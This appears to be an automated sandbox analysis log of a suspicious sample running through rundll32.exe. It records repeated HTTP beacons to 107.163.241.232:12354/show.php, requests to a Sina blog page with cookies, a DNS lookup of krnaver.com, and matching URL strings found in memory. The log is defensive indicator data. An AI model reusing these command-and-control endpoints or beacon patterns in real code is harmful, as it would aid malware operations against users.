Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: krnaver.com
Source: global traffic	DNS traffic detected: DNS query: blog.sina.com.cn

Source: rundll32.exe, 0000000B.00000003.1873365926.0000000003143000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.php
Source: rundll32.exe, 0000000B.00000002.3747807426.000000000521B000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3747891418.000000000529D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.php)
Source: rundll32.exe, 0000000B.00000003.3712679886.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2484714513.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2231428453.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2598017864.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2291900665.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2898743445.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3151099482.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1954698129.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2311063444.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2361678413.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2241271335.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2120279676.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790388775.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2081652578.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3192331090.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2300015872.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1972886857.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2715442561.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3108722812.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2103199782.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.php.
Source: rundll32.exe, 0000000B.00000003.2444614613.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2484714513.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2229640488.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230750709.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185332580.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2231428453.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996678440.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3742655429.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1899075201.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1650198931.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930989630.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2898743445.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831828387.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2812133556.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2461180812.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2241271335.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1631107673.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2836709199.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2235329739.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2633708483.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2229921304.00000000030E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.php3
Source: rundll32.exe, 0000000B.00000003.2352322390.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1872794400.0000000005E75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2804453169.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230859996.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3614190746.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2737248179.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2543180227.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1709101946.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3032265357.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3193530668.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2938955196.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2898885834.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2598064814.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1746647268.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2615055327.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2659240427.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1749224254.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1931202109.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1874878565.0000000005E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.php5
Source: rundll32.exe, 0000000B.00000003.2407360360.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3069466655.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2598017864.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3151099482.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1954698129.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2361678413.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1631107673.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2836709199.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2380844818.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2235329739.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3399364881.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3467405218.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2162385617.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2300015872.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3568732499.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1972886857.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3351830040.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3671568185.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1879231380.00000000030EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.php6
